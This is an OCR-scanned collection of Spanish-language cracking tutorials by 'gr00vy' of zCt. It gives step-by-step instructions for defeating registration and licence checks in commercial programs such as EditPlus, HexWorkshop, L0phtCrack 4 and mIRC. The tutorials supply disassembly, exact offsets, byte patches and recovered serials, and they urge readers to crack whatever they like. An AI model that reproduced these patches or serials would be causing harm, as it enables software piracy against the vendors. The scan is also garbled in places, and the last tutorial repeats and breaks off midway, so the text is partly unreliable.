Vemos algo como esto: 


WKTVYBDebugger y1.0b / by Mr. Silver £ Mr. Snow [WKT!] 2001 

[P-Code source: lLocs. Addr: OOB3F34Ch Proc. Range: 401ECOh- 40201Ch Stack: 
C Word | 
C Diword 

| 

” EBP | 

(5 ESP | 


ERP ma Enable. 


< Prev Next > 
Memory Dump (Ctrl+R4) 


Loaded Module Symbols 
Op: F5 00 00 00 00 File Dffs: EI e AS ECO Edit String Refs. (Ctrl+S) 


EI e AS ECO | Trace Commands: | Breakpoints 


Step Trace (F8] API (Ctrl+B) 
Trace Ret (F12] Dpcodes (Ctrl+0) 
Trace Over (F10] | On Execution (Ctrl+E] 
Gol (F5) 
Trace X (F6] 


Save Source Save Messages Options Form Manager (Ctrl+F) Class Manager 
Clear Messages | Help | Advanced Info (tute) | Analize BranchX 


| Command > 


Uhmmm nada interesante, vamos a ver las string references: 
Algo medio interesante, pero no pasa naranja, solo nos queda tracear.... 
Hacemos eso tracear (con F8) hasta ver algo interesante como esto: 


Uhmmm parece que vamos bien.... Seguimos traceando. 


Que es lo que ven mis ojos!!!, un branch 
O sea un salto, que pasara si lo 
invertimos? (1c por 1d) Bueno eso lo 
provamos después ok? Ahora seguimos 
traceando... 

Bueno no que que habra pasado pero cuando yo estaba traceando la primera vez, enla ventanita 
de datos me aparecio un numero de la forma 9989.............. y era el serial pero como un boludo 
no lo anote, pero no se por que no ah aparecido de vuelta???? Sera como el misterio de las 
vacas? El chupa-cabras??? 

Después de 30 seg de reflexion esas lineas quedan borradas, ya que descubrii por que mierda no 
aparecian los serials. Era por que en vez de poner un numero (123123123 p ej) puse gr0Ovy y 
no te muestra el sn si pones letras asi que volvemos al tracing y..... 


Uhhhh provemos ese numero a verga que pasa.... 
Vemos que ahora si nos registra!!! Pero aca no 
termina este tutorial, tenemos que hacer que 
podamos poner cualquier serial!!! 


Empezamos desde el principio traceando hasta llegar a el branchf, vemos que la dirección es 
00402003, entonces vamos al offset calculator de MrCrimson y ponemos: 


9 Offset Calculator v1.0 by MrCrimson¿[WkTI99] x] 
Input data 


File [CWINDOWSEscritoriointemetiCRACKINGA 
Address: [00402003 


Info 


Section: [TEXT File offset [dec]: [81 95 
Data at address: hi C5B011B File offset (hex]: [2003] 


About Exit | 


Vemos el offset en hexadecimal y vamos a el hexWorkshop y cambiamos el 1c5b por 1d5b a ver 
que pasa..... si apretamos REGISTRAME nos registra automáticamente!!!! 


Crackme creado por YOIHO E lia 
ESCRIBE AQUÍ EL SERIAL... 


ABOUT 


Ahhhh tb fíjense que con el Smartchek tb se puede, solo busquen en el arbol una rama que dice 
CLIC y abranla toda y busquen la cadena (a mano) SERIAL..... tonces mas arriba vallan 
sondeando los regstros y van a ver el numero ganador!!!! 


OK espero que les halla gustado!!! 


Como crackear el CrossTrainer II 


Hola a todos aca estoy de nuevo con un nuevo tutorial, esta ves es el segundo tutorial 
que escribo sobre aplicaciones en Visual Basic, de la mano del gran amigo 
SmartCheck. 


Bueno empecemos, abrimos el programa y.... 


Athlete Sign In 


55 Erossiralner 


achieve your maximum potential 


Copyright 1997-2000 


Registered to: grOO'wy Version: 45.3 — March 6, 2000 


Athlete Name y] 


Copyright 1997-2000 Innovative Logic Corp. All Rights Reserved. 


Como podemos ver n aparece ninguna nag, uhmm medio extranio vamos a ver que 
pas. Ponemos New... y nos sale la maldita nag (asi maldita bien de película mal 
traducida). 

Buen entonces ya tenemos como atacar no? SIITI Con el SmartChek!!! 

Abrimos el SmartCheck y apreamos ctrl.+ o para abrir el ejecutable. 

Ahora lo cargamos con F5 

Bueno una vez que le damos OK a todos los errores nos vamos a la seccion New..., y 
ponemos cualquier cosa: 


Nombre : grOOvy 
SN : 345345 


Y otra vez a los errores, una vez ke se dejo de romper las volas con los errores 
cerramos el Crasstrainer y nos vamos directamente al Smartcheck. 

Una ves en el Smartcheck buscamos la cadena 345345 que es nuestro SN, una ves 
que lo encontramos vamos examinando el codigo, uhmm en la primera búsqueda no 
aparece nada interesante (bahh si es interesante por ke comprueba la cantidad de 
caracteres de la string), pues vamos a apretar de vuelta Find Next... Ahora si!!! Vemos 
que hace uso de la funcion vbAstrmcmp para comparar dos strings 345345 y 
XMS0O::X5 pues que carajo es esto? Nuestro cereal!!!! 

Bueno espero que les haya gustado!!! 


Cracker: gr0Ovy 


WebSite: www.zencracking.com.ar 


Como crackear el Edit Plus 2.0 


Como ya abemos lo primero que tenemos que hacer es ver cual es la debilidad de la 
proteccion del programa. La primera que vemos es que nos muestra una nag scrren 
como esta: 


UNREGISTERED COPY Xx] 
EditPlus Text Editor v2.10c 
Copyright * 1998-2001 ES-Computing. 
All Riohts Reserved. 


Thank you for trying EditPlus. 
Unregistered Copy for Evaluation 


Enter Registration Code... 


This is day 1 of 30-day evaluation period. 


You should pay registration fee if you decide to 
keep it over 30-day evaluation period. 


| Agree Quit 


Uhmm esto me huele a una flag que esta en O (no registrado) y que nosotros devemos 
invertir (o sea a 1). 

Bueno tonces nos ponemos en el W32Dasm, y empecamos a buscar en las string 
references a ver que encontramos. 

Uhmmmm no hay mucho con que hacer para sacar esta nag, asi que vemos por que 
otro lado podemos atacar. 

Nos vamos a Enter registration..... y ponemos un numero cualquiera por ej grOOvy 
123123, y nos salta un mensaje: 


EditPlus 2 


Invalid registration code. 
Please check that you entered exact information. 


lfyou have any problem with your registration code, 
please contact <supportMeditplus. cor>. 


Anoten esa string por que nos va a ser util. 
Bueno la buscamos y hay 2 referencias a una parte en el codigo. La primera es esta: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0042D8DA(C) 


| 
:0042D8F3 83F86D cmp eax, 0000006D 
:0042D8F6 7577 jne 0042D96F 


:0042D8F8 8B4E1C 
:0042D8FB 50 
:0042D8FC 51 


mov ecx, dword ptr [esi+1C] 
push eax 
push ecx 


* Reference To: USER32.KillTimer, Ord:0195h 


| 
:0042D8FD FF1538474D00 


:0042D903 6AFF 
:0042D905 6A00 


Call dword ptr [004D4738] 
push FFFFFFFF 
push 00000000 


* Possible Reference to String Resource ID=24449: "Invalid registration code. 
Please check that you entered exa" 


| 
:0042D907 68815F0000 
:0042D90C E8714C0800 


push 00005F81 €-- Aterrizamos aca! 
call 004B2582 


Bueno ahora que es lo que encontramos? Encontramos la rutina que comprueba si 
muestra o no el Error de contraseña. 

Bueno ahora que hacemos? 

Como vemos mas arriba en 0042D8F6 vemos que hay un jne que nos salta el mensaje 
de error si se ejecuta. Entonce como podemos hacer para que salte? Uhámmm un 
newbie pensaria en un JE pero nosotros no somos tan newbies, somo ZenCrackers!! Y 
pensamos entonces lo que hacemos es cambiarlo por un JMP que es un EB en ves de el 
75 que tenia y con esto logramos que salte!!!! 


Bueno hacemos los cambios y vemos que pasa. NOOOO!!! No pasa que sera? 
No te preocpes lo que paso aca es que este cambio que hiciste es para la segunda 
comprobación del numero de registration asi que te va a servir para lo que vas a hacer 


ahora!!! 


Bueno ahora probamos con la segunda Referencia (Doble Clic en la string reference) y 


vamos a Parar aca: 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:0046B51F(C), :0046B52D(C) 


| 
:0046B534 85C0 
:0046B536 C6043000 


:0046B53A 0F8488000000 


:0046B540 8B442408 
:0046B544 8B48F8 
:0046B547 85C9 
:0046B549 747D 
:0046B54B 8D4C2408 
:0046B54F E870F80300 
:0046B554 8B4C2408 
:0046B558 51 
:0046B559 56 
:0046B55A E841010000 
:0046B55F 83C408 
:0046B562 85C0 
:0046B564 7510 
:0046B566 GAFF 


test eax, eax 
mov byte ptr [eax+esi], 00 
je 0046B5C8 
mov eax, dword ptr [esp+08] 
mov ecx, dword ptr [eax-08] 
test ecx, ecx 
je 0046B5C8 
lea ecx, dword ptr [esp+08] 
call 0DO4AADC4 
mov ecx, dword ptr [esp+08] 
push ecx 
push esi 
call 0O46B6A0 
add esp, 00000008 
test eax, eax 


jne 0046B576 € ACA MIRO!! 


push FFFFFFFF 


:0046B568 6A10 push 00000010 


* Possible Reference to String Resource ID=24449: "Invalid registration code. 
Please check that you entered exa" 


| 
:0046B56A 68815F0000 push 00005F81 € PARAMOS ACA 


:0046B56F E80E700400 call 004B2582 
:0046B574 EB5A jmp 0046B5DO 


y digo que es lo que puedo hacer para que me salte el dialogo de "Invalid registration 
code" y miro mas arriba (en 0046B564) y veo que hay una comprobación y un jne que 
salta a un lugar muy cerquita de aca. Justo cae en 0046B576 y justito salta las 3 
instrucciones que estan en 0046B56A 0046B56F 0046B574 o sea las del Invalid 
registration code. Como ya deben saber no nos muestra el dialogo. 

Aca lo que debemos hacer es cambiar (en el offset del JNE!!!) JNE por un JMP (O sea 
que salta siempre), o sea que cambiamos el 7510 por EB1O y listo!!!! 


Bueno seguimos investigando, y vemos donde paramos 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0046B564(C) 


| 
:0046B576 8B542408 mov edx, dword ptr [esp+08] € PARAMOS ACA 


:0046B57A 52 push edx 

:0046B57B 56 push esi 

:0046B57C ESEFFAFFFF call 0046B070 

:0046B581 83C408 add esp, 00000008 

:0046B584 85C0 test eax, eax 

:0046B586 750F jne 0046B597 Y ESTE SALTO ES MAS QUE 
:0046B588 6AFF push FFFFFFFF 

:0046B58A 50 push eax 


Entonces ese salto que marcamos es el que evita que me muestre otro dialogo que 
viene ahora? Por supuesto que si chamigo!!! Hace lo mismo que con el otro o sea 
cambia 750F por EBOF y listo el poyo!! Te salta el dialogo que te dice Registration 
failed!!! 


* Possible Reference to String Resource ID=20095: "Registration failed. 
Unexpected error occurred." 


| 
:0046B58B 687F4E0000 push 00004E7F 


:0046B590 ESED6F0400 call 004B2582 
:0046B595 EB39 jmp 0046B5DO 


Bueno ahora nos fijamos si nos registra y listo programa crackeado!!!! 


CRACKEADO POR gr0O0vy 
WEB: www.groovycracking.8m.com 


Como crackear el HexWorkShop 2.01 


Holas amigos! 
Hoy vamos a crackear el HexWorkShop que es uno de los mejores editores 
hexadecimales que hay en el mercado. 


Bueno como siempre lo primero que hacemos es abrir el programa y ver que 


debilidades tiene. Como vemos cuando vamos a Register y ponemos lo que venga nos 
sale una Nag Screen horrorosa!!! Anotamos esa String y la buscamos!!!: 


Registration Unsuccessful 


You have entered an invalid registration number. 


Please confirm you entered a valid registration 
number or contact BreakPoint Software for 
assistance. 


Como veran esta una sola ves, pero no esta como siempre esta en la mayoria de los 
programas!!! Esta de esta forma: 


Name: DialogID_0075, + of Controls=003, Caption:"Registration Unsuccessful", 
ClassName:"" 

001 - ControllD:0001, Control Class:"BUTTON" Control Text:"s:OK" 

002 - ControlID:FFFF, Control Class:"STATIC" Control Text 


003 - ControlID:FFFF, Control Class:"STATIC" Control Text:"Please confirm you 
entered a valid registration number or contact BreakPoint S" 


Uhmm ya estoy viendo a muchos de Uds. diciendo y ahora como mierda hago? Bueno 
esot es muy simple. Lo que tenemos que hace es apretar el boton de buscar y poner 
DialogID_0075 que es como una referencia al texto. 

Una ves que lo encontramos: 


* Possible Reference to Dialog: DialogID_0075 


| 
:00413053 6A75 push 00000075 


:00413055 8D8D30FFFFFF lea ecx, dword ptr [ebp+FFFFFF30] 
:0041305B E8006E0000 call 00419E60 


Vemos que podemos hacer en el codigo. En este caso miramos que mas arriba, 
concretamente en 


:00412FCA 837DF000 cmp dword ptr [ebp-10], 00000000 
: 0F8479000000 je 0041304D 
:00412FD4 8B8D2CFFFFFF mov ecx, dword ptr [ebp+FFFFFF2C] 


Hay un salto que si se ejecuta salta un monton de codigo (el codigo que se tiene que ir 
ejecutando para que el programa se registre) que al final tiene un JMP que nos lleva a 
la visctoria, que seria este: 


:00413048 E953000000 jmp 00413040 

o sea que si: 

: 0F8479000000 je 0041304D 

no se ejecuta todas las sentencias se ejecutaran hasta 
:00413048 E953000000 jmp 00413040 


y ese va a ser el salto a la victoria. Asi que ahora lo que tenemos que hacer es que el 
salto en 00412FCE no se ejecuta cambiándolo por un JE o si queres que sea mas 
eleante NOOPEALO!!! 


Bueno espéro que les halla gustado y un saludo!!! 


CRACKEADO POR gr00vy 
WEB: www.groovycracking.8m.com 


Como crackear el LOpthCrack 4.0 


Hola a todos, hoy estamos de vuelta con el LC pero en la ultima versión!!! Así que 
ahora aprenderemos a crackearlo fácilmente. 


Primero, esta es una excelentísima aplicación para recobrar/crackear passwds de los 
NT's o 2000's. La verdad que es impecable, pero su protección deja mucho que desear. 


Bueno, lo primero es instalarlo e investigarlo, asi que una ves instalado lo ejecutamos 
y vemos que nos aparece una ventanita como esta: 


LC4 Trial Version Ñ x 


(Ostake LC 4 


PASSWORD AUDITING AND RECOVERY 


li 5 Days until trial version will expire. 


E Register Help | 


Uhmm pinto como la ultima versión que era mas o menos lo mismo. Bueno, nos vamos 
a Register y nos aparece: 


Register q xj 
Serial Number: hi ed479cce? 
Unlock Code: TR 


You must register the software to receive an unlock code. 
Register at: 
http: +4wwww atstake. comélc*register. htrol 


If you are already registered and are reinstalling, go to: 
http: ¿4wwww atstake. com?Ic*reinstall htonl 


Cancel 


Uhmmm esto pinta a MessageBoxA, pero probemos. Ponemos un unlocking code on 
1234567890 y vemos que nos tira... 


Cs 


A You have entered an invalid code. Please try again. 


Listo, ya tenemos la mitad del programa crackeado, es una messagebox!!! Bueno 
abrimos el W32Dasm y desensamblamos, luego vamos a String References y 
buscamos la string You have enteres a invalid code. Please try again. La encontramos 
abajo del todo. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00411C0B(C) 


:00411C30 53 push ebx 
:00411C31 53 push ebx 


* Possible StringData Ref from Data Obj ->"You have entered an invalid 
code. " 
->"Please try again." 


:00411C32 6800144700 push 00471400push 00471400 


Uhmmm ke dice por ahi arriba, Referenced by a (U)nconditional r(C)onditional Jump at 
Address: 00411C0B(C). 


O sea que esta string es llamada por un salto condicional desde la direccion 00411C0B. 
Tonce vamos alla y vemos que hay: 


:00411C01 E8955C0100 call 0042789B 

:00411C06 83C410 add esp, 00000010 

:00411C09 85C0 test eax, eax 

:00411C0B 7523 jne 00411C30 <---- PARAMOS ACA 
:00411C0D 8B07 mov eax, dword ptr [edi] 
:00411C0F 50 push eax 


Como ven ese salto es mas sospechoso que la mierda!!! Vamos a noopearlo ya que si 
este salto se ejecuta, nos va a llevar al Mensaje que nos dice que tenemos que 
ingresar un Codigo correcto. Tonces abrimos el HexWorkShop y vamos al offset 11C0B 
y cambiamos el 7523 por 9090, lo gurdamos como LC4 Cracked.exe y luego lo 
abrimos y vamos a la seccion de registrar e ingresamos cualquier cosa y.... 


Cs 


AN You have successfully registered LC4, 


Bien, ya crackeamos una parte ya que pienso que al volver a abrirlo nos va a aparecer 
la nag de nuevo, tonces vamos a ver donde mas comprueva que estamos o no 
registrados. 


Bueno habiamos dejado en : 


:00411C01 E8955C0100 call 0042789B 
:00411C06 83c410 add esp, 00000010 
:00411C09 85C0 test eax, eax 
:00411C0B 7523 jne 00411C30 


A mi me parece que esa es la rutina de comprobación asi que vamos a ver que es lo 
que tiene adentro: 


* Referenced by a CALL at Addresses: 
|:00411983 , :00411C01 , :0042725C , :0042726D , :0042727E 
:0042728F 


:0042789B 55 push ebp 
:0042789C 8BEC mov ebp, esp 
:0042789E 83ECOC sub esp, 0000000C 
:004278A1 833DFC336B0000 cmp dword ptr [006B33FC], 00000000 
:004278A8 53 push ebx 
:004278A9 56 push esi 
:004278AA 57 push edi 
:004278AB 7512 jne 004278BF 
:004278AD FF750€ push [ebp+0C] 
:004278B0 FF7508 push [ebp+08] 
:004278B3 E8C8690000 call 0042E280 
:004278B8 59 pop ecx 

:004278B9 59 pop ecx 

:004278BA E96C010000 jmp 00427A2B 


Como vemos esta call es muy solicita ya que la llaman desde todas estas direcciones: 
00411983, 00411C01 (esta no va ya que es la call donde estamos nosotros y ya la 
noopeamos), 0042725C, 0042726D, 0042727E y 0042728F. 


Como ven esta muyyyvyvy llamada de otros lugares y entonces vamos a ver que 
pasa en esos lugares ok? Vamos a por ej 00411983: 


:00411983 E8135F0100 call 0042789B 

:00411988 83C410 add esp, 00000010 

:0041198B 85C0 test eax, eax 

:0041198D 7506 jne 00411995 <- - - Que raro no? La 


noopeamos?? SITITTI!!! 


Nopeemos ese jne a ver que pasa, pero todavía no creo que sea ese solo asi que nos 
vamos a la siguiente dirección: 0042725C 


:0042725C E83A060000 call 0042789B 
:00427261 59 pop ecx 
:00427262 85C0 test eax, eax 
:00427264 59 pop ecx 


:00427265 7433 je 00427292 


Juaz otro je despues de una call y un test, esto me pinta facil!!! Noopeemoslo al je. 
Pero para ¡!! No seas asi mira las siguientes calls que estan abajo ahí cerquita por ej 
0042726D que es la siguiente call que nosotros teniamos que ver esta unas lineas mas 
abajo: 


:0042726D E829060000 call 0042789B 
:00427272 59 pop ecx 
:00427273 85C0 test eax, eax 
:00427275 59 pop ecx 
:00427276 7422 je 00427292 


Otra vez lo mismo. Noopemos!!! 


Y ahora nos queda la ultima call asi que vamos unas lineas mas abajo que esta cerca: 


:0042727E E818060000 call 0042789B 
:00427283 59 pop ecx 
:00427284 85C0 test eax, eax 
:00427286 59 pop ecx 
:00427287 7411 je 00427292 


Otra ves lo mismo, noopeemos y provemos el programa a ver que nos dice. 

Vamos a register, ponemos un numero, damos ok. Reiniciamos el programa, y vemos 
que no nos aparece la nag, vemos a About y vemos que esta el numerito que 
ingresamos asi que ya tamos registrados!!!! Que felicidad!!! 


Espero que les halla gustado ya que creo que es el primer tuto que se hace sobre esta 
versión de LC4. Bueno como siempre sean libres!!! Y crackeen lo que se les de la gana. 


WEB: www.zencracking.com.ar 


E-mail: groovy26000yahoo.com.ar 
Grupo: zCt! 


Cracker: gr0Ovy! 


Como crackear el mIRC 6.01 ultima versión 


Hola aca estoy de nuevo con un nuvo tutorial, como ven estoy a full por que en dias 
vamos a estar recibiendo la ayuda de FiReRaln un amigo del IRC de ezkracho. 


Bueno este crack comienza asi! 
Abrimos el mirc.exe y vamos a register. Una ves ahí ponemos nuestro codigo (31337 


preferentemente ;), y nuestro nombre. Como vemos nos sale un MSGBOX que nos 
dice.... 


Registration 


The registration name and number you have entered do not 
match. 


Please make sure you are entering the registration using the 
correct capitalization and spacing. 


Bueno entonces apuntemos a esa frase The registration..... y la buscamos en las string 
references del W32Dasm. Muy bien la encontramos. 


* Possible Reference to String Resource ID=01913: "The registration name and 
number you have entered do not 


mat" 

| 
:004C3D25 6879070000 push 00000779 
:004C3D2A E88889F6FF call 0042C6B7 
:004C3D2F 50 push eax 
:004C3D30 FF7508 push [ebp+08] 


Huyyy esto no tiene nada de interesante, tampoco hay ningun salto cerca que me 
permita saltar este mensaje. Entonces vamos mas arriba, mas precisamente a: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004C3C24(C) 


Para ver por que esta llamada esa ventanita. Como vemos esta llamada por un JE en 
004C3C24, tonces vamos para alla y encontramos esto. 


:004C3C1D E88FFBFFFF call 004C37B1 Llama a la rutina de comprovacion 
:004C3C22 85C0 test eax, eax Si la call sale con 0/1 y Eax es 1/0 va 
al error 

:004C3C24 0F84B7000000 je 004C3CE1 salta dependiendo del valor del 


call hacia nuestro error. 


Uhmm tonces que hacemos, pues mas claro hechale CIF, cambiemos el JE por NOOPS, 
como seria: Nos fijamos el FOCET (C3224), lo ponemos en el HexWorkshop, nos 


fijamos de cuantos bytes consta el JE (6 por que se cuentan de a dos) y ponemos la 
misma cantidad de noops (909090909090) 6 en total. 


Aver vamos a ver que pasa. Noooo sigue apareciendo!!! Pero nos acepta el registro!!! 
Entonces que podemos hacer? Uhmm vamos a fijarnos en la call extraña que hay en 
004C3C1D. 


Enramos y..... 


* Referenced by a CALL at Addresses: 
|:004C394F ,:004C3A23 ,:004C3C1D 


| 
:004C37B1 55 push ebp 


:004C37B2 8BEC mov ebp, esp 

:004C37B4 53 push ebx 

:004C37B5 56 push esi 

:004C37B6 57 push edi 

:004C37B7 8B750C mov esi, dword ptr [ebp+0C] 
:004C37BA 8B5D0O8 mov ebx, dword ptr [ebp+08] 
:004C37BD BFDO3C5700 mov edi, 00573CDO 

Nada interesante, bajamos un poco y... 

:004C3839 E880FEFFFF call 004C36BE 

:004C383E 85C0 test eax, eax 

:004C3840 740A je 004C384C 


uhmm que parecido al de arriba, pero no importa ya no hay nada mas que hacer aca, 
que dije como que no hay mas nada que hacer? No nos fijamos en 

* Referenced by a CALL at Addresses: 

|:004C394F ,:004C3A23 ,:004C3C1D 


Vamos en tonces!!! 


004C394F: 

:004C394F ES5DFEFFFF call 004C37B1 
:004C3954 85C0 test eax, eax 
:004C3956 7418 je 004C3970 
004C3A23: 

:004C3A23 E8S89FDFFFF call 004C37B1 
:004C3A28 85C0 test eax, eax 
:004C3A2A 7445 je 004C3A71 
004C3C1D: 

:004C3C1D E88FFBFFFF call 004C37B1 
:004C3C22 85C0 test eax, eax 
:004C3C24 0F84B7000000 je 004C3CE1 


Uhmm me parece sospechoso tantas cosas iguales que saltan tan cerca una de la otra 
y haen la misma comprobación que sera? 
Pensemos en cambiar los JE por NOP o por JNE, lo hacemos y.... 


CHACHACHACHAN!!!! Felicidades! Lo crackeamos!! 


CRACKEADO POR gr00vy 
WEB: www.zencracking.com.ar 


Como crackear el NexEncode 
Studio 


Uhmmm vamos al grano ya que no tengo ganas de introducir a nada. 


Abrimos el W32Dasm y cargamos el archivo nexencode.exe, una ves desensamblado ejecutamos 
el NexEncode Studio y vemos que aparece en la barra de tray, asi que, hacemos un clic derecho 
en el iconito y vamos a Tools/Options allí vamos a Register y vemos esta pantalla: 


ES 
| Register NexENCODE 


Encoder 
Name: [groDvy 
Ripper | Password: [234234 


CDDB | Register 
[ Price: $20.00 American ] 
aneral | Register by mail: 
l Send check, cash, or money 
Players order with e-mail address 
and/or street address to... 
Register | 
Leon Alossa 


878 N Pascal Street 
St. Paul, MN, 55103 


This session only 4 3] Cancel 


Introducimos algunos datos y vemos ke pasa si le damos a Ok, nos aparecen 2 nags no 1, esto 
lo hacen para despistarnos, pero nosotros no somos tontos y vamos a ver que hacemos pero eso 
en tiempo de cracking o sea en el momento ; ) 


Bueno el primer dialogo decia una cosa mas o menos asi: 


"NexENCODE Studio could not register by itself” 
asi que buscamos esa estring y vemos que esta!!! Asi que vemos que hay : 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :005D9A57 (C) 


:OO5D9ABB 66833DB4E06300FF cmp word ptr [0063E0B4], FFFF 
:005D9AC3 0F855E010000 jne 005D9C27 


* Reference To: MSVBVM60.__ vbaStrCat, Ord:0000h 


:005D9AC9 8B3D5C104000 mov edi, dword ptr [0040105C] 
:005D9ACF B904000280 mov ecx, 80020004 
:005D9AD4 B80A000000 mov eax, 0000000A 


* Possible StringData Ref from Code Obj ->"NexENCODE Studio could not register " 


—>"itself." 


:005D9AD9 681C804D00 push 004D801C 
:O005D9ADE 68246F4D00 push 004D6F24 


Huyyyy que vemos que este dialogo es llamado por 005D9A57, vamos alla a ver que onda! : 


* Reference To: MSVBVM60.__ vbaStrCmp, Ord:0000h 
| 


:005D9A4F FF15E8104000 Call dword ptr [004010E8] 
:005D9A55 85C0 test eax, eax 
:005D9A57 7562 j¡ne OOS5D9ABB 


Juaz una llamada a __ vbaStrCmp la funcion de comparacion en aplicaciones VB!!! 
Tamos en el lugar correcto!!! Uhm para mi que noopeando el JNE vamos a ver el dialog 
de Thanks for.... a ver noopeamos y.... NOOOOO no es tan tonto el proggie pero no se 
preocupen que es facil!!! 


Vamos de vuelta a el W32Dasm y buscamos algo como esto en las String References Thanks o 
registering etc. Vemos que encontramos casi a lo ultimo: 


"Thanks for registering!" 

"The effects editor was unable " 
"There are" 

"Track = 0, cannot continue" 


uhmm 2 clic y vamos a parar aca: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0061F'97D (C) 


:0061F991 8D4DD4 lea ecx, dword ptr [ebp-2C] 


* Reference To: MSVBVM60.__vbaFree0b3, Ord:0000h 


:0061F994 FF1540124000 Call dword ptr [00401240] 
:0061F99A 8B16 mov edx, dword ptr [esi] 


ACA VAN MAS DATOS QUE NO INTERESAN 


* Possible StringData Ref from Code Obj ->"Thanks for registering!" 


:0061F9AC 6844CB4D00 push 004DCB44 
:0061F9B1 57 push edi 


Uhmmm tenemos que ver si hay mas de 1 referencia a Thanks for registering! asi que 
hacemos clic otra ves en las String References y vemos que no solo hay mas de 1 sino que son 
3, tonces lo que tenemos que hacer es: 


Como en la primera no se si notaron que les marque: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0061F'97D (C) 


bueno todo tiene una razon es por que desde ahí es llamado el dialogo!!! Tonces lo que tenemos 
que hacer es ir para alla y ver que hay (uds se tienen que fijar en las 3 yo les muestro solo la 
primera ya que son todas iguales): 


:0061F97D 7D12 jge 0061F991 
:0061F97F 688C000000 push 0000008C 
:0061F984 683CBD4D00 push 004DBD3C 


Aca paramos, es un jge y seguido de 2 push” s que sospechoso, mejor lo noopeamos al] GE asi 
se pushean ls instrucciones (que de seguro son el nombre y el numero de registro nuestro) 


WEB: [www.zencracking.com.ar 


E-mail: ¡groovy26000yahoo.com.ar 
Grupo: [zCt!] 


Como crackear el Personal Phone Book Plus! V 1.1 


Bueno, en este manual exploro una parte del cracking hasta ahora casi desconocida 
por mi hasta que hoy me baje el SamrtCheck de Numega, uds se preguntaran que es 
el smartchek? Bueno es el SICE de los programas VB, pero crackear en este es mucho 
mas facil!!! 


Bueno para sacar el serial de este programa lo primero que tenemos que hacer es 
abrir el SmartChek y configurarlo asi: 


Ir a Program/Settings y poner esto que esta en las imágenes: 


[default] - NuMega SmartCheck Settings 


2 Memory errors IM Eheck foruniitialized memory errors: 
Pointer errors 
Leaks 


API and OLE function call errors 


Advanced Settings 


Use mole CRecana el aTtaTT 


ERE Mena pate pon aealocatiah 


[default] - NuMega SmartCheck Settings 


Y en el apartedo View chekea: 
Show All Events 

Arguments 

Séquense numbers 
Supressed errors 


Una vez configurado el SmartCheck pasamos a la accion: 


Lo que tenemos que hacer ahora es apretar ctrl.+0 para abrir el programa en vb en 
este caso el PhoneBook. 

Una vez abierto apretamos F5 para iniciar el programa, nos vamos a el casillero que 
dice registrar etc o sea donde tenemos que poner el serial y ponemos cualquier cosa 
por ej 12345 

Bueno nos acaban de aparecer miles de entradas en la ventana de datos, cual de ellas 
es la que tenemos que observar, bueno si programas en algo date cuanta que el 
programa hace algo cuando se aprieta el boton entonces lo que tenemos que buscar el 
button o algo asi, en este caso encontramos que es cmdok_Clic, bueno lo abrimos y 
vemo que el Text Box se llama txtcode (donde ponemos la clave) uhmm comprueba si 
tiene 5 caracteres.... 

Huyyyyy aca hay una función en VB que compara dos Strings algo asi como un CMP en 
ASM __ vbaStrCmp uhmm compara una string medio rara (zxw37) con la nuestra 
(12345) y si ponemos zxw37 nos registrara? Pues si chamigo ese es el serial!!! 


E  cmdok_Click 
9% TextBox:4ddRefLPINTERFACE:02460298) returns DWORD:1 
%  —_ vbaDb¡iSet(LPINTERFACE *D0D6CF3C8, LPINTERFACE:02460298] retums LF 
Ea txtcode.Text 
$ % TextBox:GetProp[LPINTERFACE:02460298, int:11, PTR:006CF304) 
% — GetFocus[) retums HWND:BO 
%  — Heapálloc[HáNDLE:02450000, FL4GS:00000000, D'wORD:00000006) re 
% — GetFocus[) retums HWwND:BO 
$ TextBox:GetProp retums HRESULT:0 
$ — MultiByteTow'ideCharlunsigned int: DOODOOOO, FLAG S:00000000, PTR:0245E 
$  —SysállocStringLen(PTR:D0000000, Dw*ORD:00000005) retums LPYOID:44.2€ 
% —MultiByteTow'ideCharlunsigned int:00000000, FL4GS:D0000000, PTR:0245E 
%  —HeapFree[/HANDLE:02450000, FL4GS:D0000000, PTR:0245E6E8) returns B 
Ea txtcode.Text 
$% Right$íString:'12345", long:5] 
[ $  —SysállocStringByteLeníchar *:004428C8, DW'ORD:00000004]) returns LPWOIL 
$% Riaht$ 
$  —_ vbaStiMove(String:""12345", LPBSTR:DD6CF3CC) returns DWDRD:44286C 
2 — vbaStCmpísSting:"zxw37", String:""12345""] returns DW*DRD:FFFFFFFF 


Crackeado por gr00vy 
Pagina: www.zencracking.com.ar 


Como crackear el Personal Phone Book Plus! V 1.1 


Bueno, en este manual exploro una parte del cracking hasta ahora casi desconocida 
por mi hasta que hoy me baje el SamrtCheck de Numega, uds se preguntaran que es 
el smartchek? Bueno es el SICE de los programas VB, pero crackear en este es mucho 
mas facil!!! 


Bueno para sacar el serial de este programa lo primero que tenemos que hacer es 
abrir el SmartChek y configurarlo asi: 


Ir a Program/Settings y poner esto que esta en las imágenes: 


[default] - NuMega SmartCheck Settings 


2 Memory errors IM Eheck foruniitialized memory errors: 
Pointer errors 
Leaks 


API and OLE function call errors 


Advanced Settings 


Use mole CRecana el aTtaTT 


ERE Mena pate pon aealocatiah 


[default] - NuMega SmartCheck Settings 


Y en el apartedo View chekea: 
Show All Events 

Arguments 

Séquense numbers 
Supressed errors 


Una vez configurado el SmartCheck pasamos a la accion: 


Lo que tenemos que hacer ahora es apretar ctrl.+0 para abrir el programa en vb en 
este caso el PhoneBook. 

Una vez abierto apretamos F5 para iniciar el programa, nos vamos a el casillero que 
dice registrar etc o sea donde tenemos que poner el serial y ponemos cualquier cosa 
por ej 12345 

Bueno nos acaban de aparecer miles de entradas en la ventana de datos, cual de ellas 
es la que tenemos que observar, bueno si programas en algo date cuanta que el 
programa hace algo cuando se aprieta el boton entonces lo que tenemos que buscar el 
button o algo asi, en este caso encontramos que es cmdok_Clic, bueno lo abrimos y 
vemo que el Text Box se llama txtcode (donde ponemos la clave) uhmm comprueba si 
tiene 5 caracteres.... 

Huyyyyy aca hay una función en VB que compara dos Strings algo asi como un CMP en 
ASM __ vbaStrCmp uhmm compara una string medio rara (zxw37) con la nuestra 
